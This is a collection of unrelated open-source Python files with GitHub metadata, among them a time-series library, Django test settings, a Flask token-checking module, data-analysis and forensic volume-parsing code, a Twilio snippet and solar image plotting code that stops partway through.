end (orderable, optional): The upper time bound of
when to calculate the distribution. By default, the
last time point will be used.
normalized (bool): If True, distribution will sum to
one. If False and the time values of the TimeSeries
are datetimes, the units will be seconds.
mask (:obj:`TimeSeries`, optional): A domain on which to
calculate the distribution.
interpolate (str, optional): Method for interpolating
between measurement points: either "previous"
(default) or "linear". Note: if "previous" is used,
then the resulting histogram is exact. If "linear" is
given, then the values used for the histogram are the
average value for each segment -- the mean of this
histogram will be exact, but higher moments (variance)
will be approximate.
Returns:
:obj:`Histogram` with the results.
"""
start, end, mask = self._check_boundaries(start, end, mask=mask)
counter = histogram.Histogram()
for i_start, i_end, _ in mask.iterperiods(value=True):
for t0, t1, _ in self.iterperiods(i_start, i_end):
duration = utils.duration_to_number(t1 - t0, units="seconds",)
midpoint = utils.time_midpoint(t0, t1)
value = self.get(midpoint, interpolate=interpolate)
try:
counter[value] += duration
except histogram.UnorderableElements:
counter = histogram.Histogram.from_dict(
dict(counter), key=hash
)
counter[value] += duration
# divide by total duration if result needs to be normalized
if normalized:
return counter.normalized()
else:
return counter
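# Illustrative sketch (not in the original file): a series that is 0 on
# [0, 3) and 1 on [3, 4) spends 75% of the time at 0 and 25% at 1:
#
#     ts = TimeSeries(default=0)
#     ts[0], ts[3], ts[4] = 0, 1, 0
#     ts.distribution(start=0, end=4)   # Histogram: {0: 0.75, 1: 0.25}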
def n_points(
self,
start=-inf,
end=+inf,
mask=None,
include_start=True,
include_end=False,
normalized=False,
):
"""Calculate the number of points over the given time range from
`start` to `end`.
Args:
start (orderable, optional): The lower time bound of when
to calculate the distribution. By default, start is
-infinity.
end (orderable, optional): The upper time bound of when to
calculate the distribution. By default, the end is
+infinity.
mask (:obj:`TimeSeries`, optional): A
domain on which to calculate the distribution.
Returns:
`int` with the result
"""
# just go ahead and return 0 if we already know it regardless
# of boundaries
if not self.n_measurements():
return 0
start, end, mask = self._check_boundaries(start, end, mask=mask)
count = 0
for i_start, i_end, _ in mask.iterperiods(value=True):
if include_end:
end_count = self._d.bisect_right(i_end)
else:
end_count = self._d.bisect_left(i_end)
if include_start:
start_count = self._d.bisect_left(i_start)
else:
start_count = self._d.bisect_right(i_start)
count += end_count - start_count
if normalized:
count /= float(self.n_measurements())
return count
def _check_time_series(self, other):
"""Function used to check the type of the argument and raise an
informative error message if it's not a TimeSeries.
"""
if not isinstance(other, TimeSeries):
msg = "unsupported operand types(s) for +: %s and %s" % (
type(self),
type(other),
)
raise TypeError(msg)
@staticmethod
def _iter_merge(timeseries_list):
"""This function uses a priority queue to efficiently yield the (time,
value_list) tuples that occur from merging together many time
series.
"""
# cast to list since this is getting iterated over several
# times (causes problem if timeseries_list is a generator)
timeseries_list = list(timeseries_list)
# Create iterators for each timeseries and then add the first
# item from each iterator onto a priority queue. The first
# item to be popped will be the one with the lowest time
queue = PriorityQueue()
for index, timeseries in enumerate(timeseries_list):
iterator = iter(timeseries)
try:
t, value = next(iterator)
except StopIteration:
pass
else:
queue.put((t, index, value, iterator))
# `state` keeps track of the value of the merged
# TimeSeries. It starts with the default. It starts as a list
# of the default value for each individual TimeSeries.
state = [ts.default for ts in timeseries_list]
while not queue.empty():
# get the next time with a measurement from queue
t, index, next_value, iterator = queue.get()
# make a copy of previous state, and modify only the value
# at the index of the TimeSeries that this item came from
state = list(state)
state[index] = next_value
yield t, state
# add the next measurement from the time series to the
# queue (if there is one)
try:
t, value = next(iterator)
except StopIteration:
pass
else:
queue.put((t, index, value, iterator))
@classmethod
def iter_merge(cls, timeseries_list):
"""Iterate through several time series in order, yielding (time, list)
tuples where list is the values of each individual TimeSeries
in the list at time t.
"""
# using return without an argument is the way to say "the
# iterator is empty" when there is nothing to iterate over
# (the more you know...)
if not timeseries_list:
return
# for ts in timeseries_list:
# if ts.is_floating():
# msg = "can't merge empty TimeSeries with no default value"
# raise KeyError(msg)
# This function mostly wraps _iter_merge, the main point of
# this is to deal with the case of tied times, where we only
# want to yield the last list of values that occurs for any
# group of tied times.
index, previous_t, previous_state = -1, object(), object()
for index, (t, state) in enumerate(cls._iter_merge(timeseries_list)):
if index > 0 and t != previous_t:
yield previous_t, previous_state
previous_t, previous_state = t, state
# only yield final thing if there was at least one element
# yielded by _iter_merge
if index > -1:
yield previous_t, previous_state
@classmethod
def merge(cls, ts_list, compact=True, operation=None):
"""Iterate through several time series in order, yielding (time,
`value`) where `value` is either the list of the values of each
individual TimeSeries in the list at time t (in the same order
as in ts_list) or the result of the optional `operation` on
that list of values.
"""
# If operation is not given then the default is the list
# of defaults of all time series
# If operation is given, then the default is the result of
# the operation over the list of all defaults
default = [ts.default for ts in ts_list]
if operation:
default = operation(default)
result = cls(default=default)
for t, merged in cls.iter_merge(ts_list):
if operation is None:
value = merged
else:
value = operation(merged)
result.set(t, value, compact=compact)
return result
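# Illustrative sketch (not in the original file): merging two 0/1 series
# into a count of how many are "on" at any time:
#
#     a, b = TimeSeries(default=0), TimeSeries(default=0)
#     a[1], a[3] = 1, 0
#     b[2], b[4] = 1, 0
#     TimeSeries.merge([a, b], operation=sum)
#     # value is 1 on [1, 2), 2 on [2, 3), 1 on [3, 4), then 0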
@staticmethod
def csv_time_transform(raw):
return date_parse(raw)
@staticmethod
def csv_value_transform(raw):
return str(raw)
@classmethod
def from_csv(
cls,
filename,
time_column=0,
value_column=1,
time_transform=None,
value_transform=None,
skip_header=True,
default=None,
):
# use default on class if not given
if time_transform is None:
time_transform = cls.csv_time_transform
if value_transform is None:
value_transform = cls.csv_value_transform
result = cls(default=default)
with open(filename) as infile:
reader = csv.reader(infile)
if skip_header:
next(reader)
for row in reader:
time = time_transform(row[time_column])
value = value_transform(row[value_column])
result[time] = value
return result
def operation(self, other, function, **kwargs):
"""Calculate "elementwise" operation either between this TimeSeries
and another one, i.e.
operation(t) = function(self(t), other(t))
or between this timeseries and a constant:
operation(t) = function(self(t), other)
If it's another time series, the measurement times in the
resulting TimeSeries will be the union of the sets of
measurement times of the input time series. If it's a
constant, the measurement times will not change.
"""
result = TimeSeries(**kwargs)
if isinstance(other, TimeSeries):
for time, value in self:
result[time] = function(value, other[time])
for time, value in other:
result[time] = function(self[time], value)
else:
for time, value in self:
result[time] = function(value, other)
return result
def to_bool(self, invert=False):
"""Return the truth value of each element."""
if invert:
def function(x, y):
return not bool(x)
else:
def function(x, y):
return bool(x)
return self.operation(None, function)
def threshold(self, value, inclusive=False):
"""Return True if > than treshold value (or >= threshold value if
inclusive=True).
"""
if inclusive:
def function(x, y):
return x >= y
else:
def function(x, y):
return x > y
return self.operation(value, function)
def sum(self, other):
"""sum(x, y) = x(t) + y(t)."""
return TimeSeries.merge(
[self, other], operation=operations.ignorant_sum
)
def difference(self, other):
"""difference(x, y) = x(t) - y(t)."""
return self.operation(other, lambda x, y: x - y)
def multiply(self, other):
"""mul(t) = self(t) * other(t)."""
return self.operation(other, lambda x, y: x * y)
def logical_and(self, other):
"""logical_and(t) = self(t) and other(t)."""
return self.operation(other, lambda x, y: int(x and y))
def logical_or(self, other):
"""logical_or(t) = self(t) or other(t)."""
return self.operation(other, lambda x, y: int(x or y))
def logical_xor(self, other):
"""logical_xor(t) = self(t) ^ other(t)."""
return self.operation(other, lambda x, y: int(bool(x) ^ bool(y)))
def __setitem__(self, time, value):
"""Allow a[time] = value syntax or a a[start:end]=value."""
if isinstance(time, slice):
return self.set_interval(time.start, time.stop, value)
else:
return self.set(time, value)
def __getitem__(self, time):
"""Allow a[time] syntax."""
if isinstance(time, slice):
raise ValueError("Syntax a[start:end] not allowed")
else:
return self.get(time)
def __delitem__(self, time):
"""Allow del[time] syntax."""
if isinstance(time, slice):
return self.remove_points_from_interval(time.start, time.stop)
else:
return self.remove(time)
def __add__(self, other):
"""Allow a + b syntax"""
return self.sum(other)
def __radd__(self, other):
"""Allow the operation 0 + TimeSeries() so that builtin sum function
works on an iterable of TimeSeries.
"""
# skip type check if other is the integer 0
if not other == 0:
self._check_time_series(other)
# 0 + self = self
return self
def __sub__(self, other):
"""Allow a - b syntax"""
return self.difference(other)
def __mul__(self, other):
"""Allow a * b syntax"""
return self.multiply(other)
def __and__(self, other):
"""Allow a & b syntax"""
return self.logical_and(other)
def __or__(self, other):
"""Allow a | b syntax"""
return self.logical_or(other)
def __xor__(self, other):
"""Allow a ^ b syntax"""
return self.logical_xor(other)
def __eq__(self, other):
return self.items() == other.items()
def __ne__(self, other):
return not (self == other)
def _check_boundary(self, value, allow_infinite, lower_or_upper):
if lower_or_upper == "lower":
infinity_value = -inf
method_name = "first_key"
elif lower_or_upper == "upper":
infinity_value = inf
method_name = "last_key"
else:
msg = '`lower_or_upper` must be "lower" or "upper", got {}'.format(
lower_or_upper,
)
raise ValueError(msg)
if value is None:
if allow_infinite:
return infinity_value
else:
try:
return getattr(self, method_name)()
except IndexError:
msg = (
"can't use '{}' for default {} boundary "
"of empty TimeSeries"
).format(method_name, lower_or_upper)
raise KeyError(msg)
else:
return value
def _check_boundaries(self, start, end, mask=None, allow_infinite=False):
if mask is not None and mask.is_empty():
raise ValueError("mask can not be empty")
# if only a mask is passed in, return mask boundaries and mask
if start is None and end is None and mask is not None:
return mask.first_key(), mask.last_key(), mask
# replace with defaults if not given
start = self._check_boundary(start, allow_infinite, "lower")
end = self._check_boundary(end, allow_infinite, "upper")
if start >= end:
msg = "start can't be >= end ({} >= {})".format(start, end)
raise ValueError(msg)
start_end_mask = TimeSeries(default=False)
start_end_mask[start] = True
start_end_mask[end] = False
if mask is None:
mask = start_end_mask
else:
mask = mask & start_end_mask
return start, end, mask
def distribution_by_hour_of_day(
self, first=0, last=23, start=None, end=None
):
start, end, mask = self._check_boundaries(start, end)
result = []
for hour in range(first, last + 1):
mask = hour_of_day(start, end, hour)
result.append((hour, self.distribution(mask=mask)))
return result
def distribution_by_day_of_week(
self, first=0, last=6, start=None, end=None
):
start, end, mask = self._check_boundaries(start, end)
result = []
for week in range(first, last + 1):
mask = day_of_week(start, end, week)
result.append((week, self.distribution(mask=mask)))
return result
def plot(
self,
interpolate="previous",
figure_width=12,
linewidth=1,
marker="o",
markersize=3,
color="#222222",
):
return plot.plot(
self,
interpolate=interpolate,
figure_width=figure_width,
linewidth=linewidth,
marker=marker,
markersize=markersize,
color=color,
)
def hour_of_day(start, end, hour):
# start should be date, or if datetime, will use date of datetime
floored = utils.datetime_floor(start)
domain = TimeSeries(default=False)
for day_start in utils.datetime_range(
floored, end, "days", inclusive_end=True
):
interval_start = day_start + datetime.timedelta(hours=hour)
interval_end = interval_start + datetime.timedelta(hours=1)
domain[interval_start] = True
domain[interval_end] = False
result = domain.slice(start, end)
result[end] = False
return result
def day_of_week(start, end, weekday):
# allow weekday name or number
number = utils.weekday_number(weekday)
# start should be date, or if datetime, will use date of datetime
floored = utils.datetime_floor(start)
next_week = floored + datetime.timedelta(days=7)
for day in utils.datetime_range(floored, next_week, "days"):
if day.weekday() == number:
first_day = day
break
domain = TimeSeries(default=False)
for week_start in utils.datetime_range(
first_day, end, "weeks", inclusive_end=True
):
interval_start = week_start
interval_end = interval_start + datetime.timedelta(days=1)
domain[interval_start] = True
domain[interval_end] = False
result = domain.slice(start, end)
result[end] = False
return result
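# --- Hypothetical usage sketch (illustration only, not part of the module) ---
# Assuming integer-valued times for simplicity:
#   a = TimeSeries(default=0)
#   a[0], a[5] = 1, 0           # a is 1 on [0, 5) and 0 afterwards
#   b = TimeSeries(default=0)
#   b[3], b[8] = 2, 0           # b is 2 on [3, 8) and 0 afterwards
#   (a + b)[4]                  # -> 3, via TimeSeries.merge
#   a.threshold(0)[1]           # -> True, since a(1) = 1 > 0
#   (a & b.to_bool())[4]        # -> 1, both series are nonzero at t = 4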
|
{
"content_hash": "991bfb0702ea9ea207cfcd26c62b124d",
"timestamp": "",
"source": "github",
"line_count": 1120,
"max_line_length": 79,
"avg_line_length": 32.159821428571426,
"alnum_prop": 0.5597323634748327,
"repo_name": "datascopeanalytics/traces",
"id": "356b8d2e7c901fc900ecbc40bc61b6de128ea528",
"size": "36019",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "traces/timeseries.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2140"
},
{
"name": "Python",
"bytes": "100644"
}
],
"symlink_target": ""
}
|
import os
DIRNAME = os.path.dirname(__file__)
DJANGO_PROJECT = 'test_app'
DJANGO_SETTINGS_MODULE = 'test_app.settings'
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'ado_mssql'.
'NAME': 'test.db',
}
}
# Local time zone for this installation. All choices can be found here:
# http://www.postgresql.org/docs/current/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
TIME_ZONE = 'US/Pacific'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
# Image files will be stored off of this path.
MEDIA_ROOT = os.path.join(DIRNAME, 'static/')
#MEDIA_ROOT = "/static"
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
#MEDIA_URL = 'site_media'
MEDIA_URL = "/static/"
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = ''
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
"django.middleware.common.CommonMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
#"django.middleware.csrf.CsrfViewMiddleware", # views in livesettings have enabled CSRF regardless of this setting
"django.middleware.locale.LocaleMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.doc.XViewMiddleware",
#'debug_toolbar.middleware.DebugToolbarMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = ('django.contrib.auth.context_processors.auth',)
ROOT_URLCONF = 'test_app.urls'
INSTALLED_APPS = (
'django.contrib.sites',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.comments',
'django.contrib.flatpages',
'django.contrib.sessions',
'django.contrib.sitemaps',
'livesettings',
'keyedcache',
'test_app.localsite',
)
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS' : False,
}
CACHE_PREFIX = 'T'
CACHE_TIMEOUT = 300
# If you use logging with the level DEBUG in your application, prevent increasing
# of logging level of keyedcache by uncommenting the following:
#import logging
#logging.getLogger('keyedcache').setLevel(logging.INFO)
DEBUG = True
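# A typical invocation against these settings (hypothetical sketch):
#   DJANGO_SETTINGS_MODULE=test_app.settings django-admin test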
|
{
"content_hash": "8119b192a257f75b618cd0e666edd6b0",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 119,
"avg_line_length": 30.303030303030305,
"alnum_prop": 0.7196666666666667,
"repo_name": "pombredanne/django-livesettings",
"id": "32db4fb39098c2d3cb8b6eb72c80b0b7084d0e65",
"size": "3187",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "livesettings/test_app/settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import jwt
import json
import urllib2
from functools import wraps
from flask import request
from app.handler.dbHelper import DBHelper
from app.config import DOP_API_RPT
from app.handler.error_handler import CustomError, PermissionDenied, NotAuthorized
__author__ = 'Xiaoxiao.Xiong'
def validate_token(auth):
"""
Inspect ext_id
:param auth: the content of HTTP Authorization header
:return: Boolean true/false
"""
parts = auth.split()
if len(parts) != 2:
raise CustomError('Wrong context of Authorization Header')
if parts[0].lower() != 'bearer':
raise CustomError('Unsupported authorization type')
if DBHelper.check_token(parts[1]):
return True
else:
return False
def require_token(fn):
@wraps(fn)
def _wrap(*args, **kwargs):
if 'Authorization' not in request.headers:
raise CustomError('Authorization header Required')
auth = request.headers['Authorization']
f = validate_token(auth)
if f is not True:
raise PermissionDenied(payload={'detail': 'Invalid ext_id'})
return fn(*args, **kwargs)
return _wrap
def validate_rpt(rpt):
"""
Inspect RPT via requesting api of DOP
:param rpt: JWT Token
:return: Boolean, if RPT valid return True, otherwise return False
"""
try:
req = urllib2.Request(DOP_API_RPT, json.dumps({'rpt':rpt}))
req.add_header('Content-Type', 'application/json')
f = urllib2.urlopen(req, timeout=4).read()
obj = json.loads(f)
        if 'status' not in obj:
            raise AttributeError('Authorization server did not respond with the expected message')
        if obj['status'] is True:
            return True
        elif obj['status'] is False:
            return False
        else:
            raise ValueError('Authorization server did not respond with an expected value')
    except Exception:
        raise
def require_rpt(fn):
@wraps(fn)
def _wrap(*args, **kwargs):
if 'Authorization' not in request.headers:
raise CustomError('Authorization header Required')
auth = request.headers['Authorization']
parts = auth.split()
if len(parts) != 2:
raise CustomError('Wrong context of Authorization Header')
if parts[0].lower() != 'bearer':
raise CustomError('Unsupported authorization type')
# Inspect RPT
f = validate_rpt(parts[1])
if f is False:
raise NotAuthorized('Invalid RPT', 401)
# get key_for_rpt from database to decode RPT
try:
pass
# payload = jwt.decode(parts[1], 'secret', algorithms=['HS256'])
except jwt.InvalidTokenError as e:
raise CustomError(repr(e), 403)
return fn(*args, **kwargs)
return _wrap
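# --- Hypothetical usage sketch (not part of the original module) ---
# The decorators above would typically guard Flask views like so:
#   from flask import Flask, jsonify
#   app = Flask(__name__)
#   @app.route('/protected')
#   @require_token
#   def protected():
#       return jsonify({'ok': True})
# A request must then carry "Authorization: Bearer <token>"; otherwise
# require_token raises CustomError before the view body runs.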
|
{
"content_hash": "4c7d4239ed0fc142c1ce637b82b2f4fd",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 94,
"avg_line_length": 25.580357142857142,
"alnum_prop": 0.6160558464223386,
"repo_name": "dhrproject/mydatasource",
"id": "045f3abebfffc276bfa94b15972a48de0a475c1f",
"size": "2865",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "DataSource/app/auth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "77296"
},
{
"name": "Shell",
"bytes": "520"
}
],
"symlink_target": ""
}
|
"""
Calculate correlations and covariance
"""
import pandas as pd
import matplotlib
matplotlib.use("Agg") # Needed to save figures
import matplotlib.pyplot as plt
# --- Import data ---
print("## Loading Data")
train = pd.read_csv('../inputs/train.csv')
# --- Process data ---
print("## Data Processing")
# Define parameters
output_col_name = "target"
id_col_name = "ID"
train = train.drop(id_col_name, axis=1)
# --- Calculate matrices and save to csv ---
print("## Calculating matrices")
print(" - Pearson correlation matrix")
correlation_p = train.corr() # Pearson method
correlation_p.to_csv('stats/correlation_matrix_pearson.csv')
# print(" - Kendall Tau correlation matrix")
# correlation_k = train.corr(method='kendall') # Kendall Tau
# correlation_k.to_csv('stats/correlation_matrix_kendall.csv')
print(" - Spearman correlation matrix")
correlation_s = train.corr(method='spearman') # Spearman
correlation_s.to_csv('stats/correlation_matrix_spearman.csv')
covariance = train.cov()
covariance.to_csv('stats/covariance_matrix.csv')
# --- Plot matrices ---
print("## Plotting")
plt.matshow(correlation_p)
plt.savefig('stats/correlation_matrix_pearson.png')
plt.clf()
# plt.matshow(correlation_k)
# plt.savefig('stats/correlation_matrix_kendall.png')
# plt.clf()
plt.matshow(correlation_s)
plt.savefig('stats/correlation_matrix_spearman.png')
plt.clf()
plt.matshow(covariance)
plt.savefig('stats/covariance_matrix.png')
plt.clf()
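# The saved matrices can be read back with the feature names as the index
# (hypothetical follow-up, not part of the original script):
#   loaded = pd.read_csv('stats/correlation_matrix_pearson.csv', index_col=0)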
|
{
"content_hash": "9944bafbf0b215ac6ea5b4493d0ee7a8",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 63,
"avg_line_length": 25.125,
"alnum_prop": 0.7307213930348259,
"repo_name": "HighEnergyDataScientests/bnpcompetition",
"id": "7d807eb6bfa27cf6f4b879af82c123b95a537a23",
"size": "1843",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "feature_analysis/correlation.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "544000"
},
{
"name": "Python",
"bytes": "36365"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from django.contrib import admin
from easy_maps.admin import AddressAdmin
from easy_maps.models import Address
admin.site.register(Address, AddressAdmin)
|
{
"content_hash": "cd71b41d62fe17511f9911b80d3111bc",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 42,
"avg_line_length": 32.333333333333336,
"alnum_prop": 0.8247422680412371,
"repo_name": "hfeeki/django-easy-maps",
"id": "0c1d0ffe0c9d0a223552ab2e9029ad562c2687c1",
"size": "218",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "easy_maps_tests/test_app/admin.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
"""The SleuthKit (TSK) volume system."""
from dfvfs.lib import definitions
from dfvfs.lib import tsk_partition
from dfvfs.volume import factory
from dfvfs.volume import volume_system
class TSKVolume(volume_system.Volume):
"""Volume that uses pytsk3."""
def __init__(self, file_entry, bytes_per_sector):
"""Initializes a volume.
Args:
file_entry (TSKPartitionFileEntry): a TSK partition file entry.
bytes_per_sector (int): number of bytes per sector.
"""
super(TSKVolume, self).__init__(file_entry.name)
self._file_entry = file_entry
self._bytes_per_sector = bytes_per_sector
def _Parse(self):
"""Extracts attributes and extents from the volume."""
tsk_vs_part = self._file_entry.GetTSKVsPart()
tsk_addr = getattr(tsk_vs_part, 'addr', None)
if tsk_addr is not None:
address = volume_system.VolumeAttribute('address', tsk_addr)
self._AddAttribute(address)
tsk_desc = getattr(tsk_vs_part, 'desc', None)
if tsk_desc is not None:
# pytsk3 returns an UTF-8 encoded byte string.
try:
tsk_desc = tsk_desc.decode('utf8')
self._AddAttribute(volume_system.VolumeAttribute(
'description', tsk_desc))
except UnicodeError:
pass
start_sector = tsk_partition.TSKVsPartGetStartSector(tsk_vs_part)
number_of_sectors = tsk_partition.TSKVsPartGetNumberOfSectors(tsk_vs_part)
volume_extent = volume_system.VolumeExtent(
start_sector * self._bytes_per_sector,
number_of_sectors * self._bytes_per_sector)
self._extents.append(volume_extent)
class TSKVolumeSystem(volume_system.VolumeSystem):
"""Volume system that uses pytsk3."""
TYPE_INDICATOR = definitions.TYPE_INDICATOR_TSK_PARTITION
VOLUME_IDENTIFIER_PREFIX = 'p'
def __init__(self):
"""Initializes a volume system.
Raises:
VolumeSystemError: if the volume system could not be accessed.
"""
super(TSKVolumeSystem, self).__init__()
self.bytes_per_sector = 512
def _Parse(self):
"""Extracts sections and volumes from the volume system."""
root_file_entry = self._file_system.GetRootFileEntry()
tsk_volume = self._file_system.GetTSKVolume()
self.bytes_per_sector = tsk_partition.TSKVolumeGetBytesPerSector(tsk_volume)
for sub_file_entry in root_file_entry.sub_file_entries:
tsk_vs_part = sub_file_entry.GetTSKVsPart()
start_sector = tsk_partition.TSKVsPartGetStartSector(tsk_vs_part)
number_of_sectors = tsk_partition.TSKVsPartGetNumberOfSectors(tsk_vs_part)
if start_sector is None or number_of_sectors is None:
continue
if tsk_partition.TSKVsPartIsAllocated(tsk_vs_part):
volume = TSKVolume(sub_file_entry, self.bytes_per_sector)
self._AddVolume(volume)
volume_extent = volume_system.VolumeExtent(
start_sector * self.bytes_per_sector,
number_of_sectors * self.bytes_per_sector)
self._sections.append(volume_extent)
factory.Factory.RegisterVolumeSystem(TSKVolumeSystem)
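# --- Hypothetical usage sketch (illustration only) ---
# Once registered with the factory, the volume system is resolved from a
# TSK_PARTITION path specification, roughly:
#   volume_system = TSKVolumeSystem()
#   volume_system.Open(path_spec)  # path_spec: a TSK partition path spec
#   for volume in volume_system.volumes:
#       print(volume.identifier)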
|
{
"content_hash": "cfe0f4e54720ee4a1df5e7079029c467",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 80,
"avg_line_length": 33.2967032967033,
"alnum_prop": 0.6914191419141914,
"repo_name": "joachimmetz/dfvfs",
"id": "9d49d07b1340ba443c3b5b6996444c7e846d59b3",
"size": "3054",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "dfvfs/volume/tsk_volume_system.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "14212"
},
{
"name": "Makefile",
"bytes": "122"
},
{
"name": "PowerShell",
"bytes": "1021"
},
{
"name": "Python",
"bytes": "2176548"
},
{
"name": "Shell",
"bytes": "19355"
}
],
"symlink_target": ""
}
|
import os
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
# To set up environmental variables, see http://twil.io/secure
account_sid = os.environ['TWILIO_ACCOUNT_SID']
auth_token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account_sid, auth_token)
# Get an object from its sid. If you do not have a sid,
# check out the list resource examples on this page
ip_access_control_list = client.sip \
.ip_access_control_lists("AL32a3c49700934481addd5ce1659f04d2") \
.update("Avons Lieutenants")
print(ip_access_control_list.friendly_name)
|
{
"content_hash": "0a6ccec585e1c1a0730211c1724450dd",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 68,
"avg_line_length": 37.1875,
"alnum_prop": 0.7579831932773109,
"repo_name": "TwilioDevEd/api-snippets",
"id": "7342e37c786e78011d58c3281f14a078e9b268f1",
"size": "668",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rest/sip-in/update-ip-acl-instance/update-ip-acl-instance.7.x.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "637161"
},
{
"name": "C++",
"bytes": "24856"
},
{
"name": "Go",
"bytes": "7217"
},
{
"name": "HTML",
"bytes": "335"
},
{
"name": "Java",
"bytes": "912474"
},
{
"name": "JavaScript",
"bytes": "512877"
},
{
"name": "M",
"bytes": "147"
},
{
"name": "Objective-C",
"bytes": "53325"
},
{
"name": "PHP",
"bytes": "517186"
},
{
"name": "Python",
"bytes": "442184"
},
{
"name": "Ruby",
"bytes": "438928"
},
{
"name": "Shell",
"bytes": "3854"
},
{
"name": "Swift",
"bytes": "42345"
},
{
"name": "TypeScript",
"bytes": "16767"
}
],
"symlink_target": ""
}
|
"""
Plotting functions for easily and quickly visualizing synthesized AIA results
"""
import os
import numpy as np
import h5py
import matplotlib.pyplot as plt
import matplotlib.colors
import matplotlib.animation
import astropy.units as u
from astropy.coordinates import SkyCoord
from sunpy.map import Map
__all__ = ['plot_aia_channels', 'make_aia_animation']
def plot_aia_channels(aia, time: u.s, root_dir, corners=None, figsize=None, norm=None, fontsize=14,
**kwargs):
"""
Plot maps of the EUV channels of AIA for a given timestep
Parameters
----------
aia : `synthesizAR.instruments.InstrumentSDOAIA`
    time : `astropy.units.Quantity`
root_dir : `str`
figsize : `tuple`, optional
"""
if figsize is None:
figsize = (15, 10)
if norm is None:
norm = matplotlib.colors.SymLogNorm(1e-6, vmin=1, vmax=5e3)
with h5py.File(aia.counts_file, 'r') as hf:
reference_time = u.Quantity(hf['time'], hf['time'].attrs['unit'])
i_time = np.where(reference_time == time)[0][0]
fig_format = os.path.join(root_dir, f'{aia.name}', '{}', f'map_t{i_time:06d}.fits')
fig = plt.figure(figsize=figsize)
plt.subplots_adjust(wspace=0., hspace=0., top=0.95)
ims = {}
for i, channel in enumerate(aia.channels):
tmp = Map(fig_format.format(channel['name']))
if corners is not None:
blc = SkyCoord(*corners[0], frame=tmp.coordinate_frame)
trc = SkyCoord(*corners[1], frame=tmp.coordinate_frame)
tmp = tmp.submap(blc, trc)
ax = fig.add_subplot(2, 3, i+1, projection=tmp)
ims[channel['name']] = tmp.plot(annotate=False, title=False, norm=norm)
lon, lat = ax.coords
lon.grid(alpha=0)
lat.grid(alpha=0)
if i % 3 == 0:
lat.set_axislabel(r'solar-y [arcsec]', fontsize=fontsize)
else:
lat.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
if i > 2:
lon.set_axislabel(r'solar-x [arcsec]', fontsize=fontsize)
else:
lon.set_ticks_visible(False)
lon.set_ticklabel_visible(False)
ax.text(0.1*tmp.dimensions.x.value, 0.9*tmp.dimensions.y.value,
r'${}$ $\mathrm{{\mathring{{A}}}}$'.format(channel['name']),
color='w', fontsize=fontsize)
fig.suptitle(r'$t={:.0f}$ {}'.format(time.value, time.unit.to_string()), fontsize=fontsize)
if kwargs.get('use_with_animation', False):
return fig, ims
def make_aia_animation(aia, start_time: u.s, stop_time: u.s, root_dir, figsize=None, norm=None,
fontsize=14, **kwargs):
"""
Build animation from a series of synthesized AIA observations
"""
with h5py.File(aia.counts_file, 'r') as hf:
reference_time = u.Quantity(hf['time'], hf['time'].attrs['unit'])
start_index = np.where(reference_time == start_time)[0][0]
stop_index = np.where(reference_time == stop_time)[0][0]
fig_format = os.path.join(root_dir, f'{aia.name}', '{}', 'map_t{:06d}.fits')
fig, ims = plot_aia_channels(aia, start_time, root_dir, figsize=figsize, norm=norm,
fontsize=fontsize, use_with_animation=True)
def update_fig(i):
for channel in aia.channels:
tmp = Map(fig_format.format(channel['name'], i))
ims[channel['name']].set_array(tmp.data)
fig.suptitle(f'$t={reference_time[i].value:.0f}$ {reference_time.unit.to_string()}',
fontsize=fontsize)
return [ims[k] for k in ims]
animator_settings = {'interval': 50, 'blit': True}
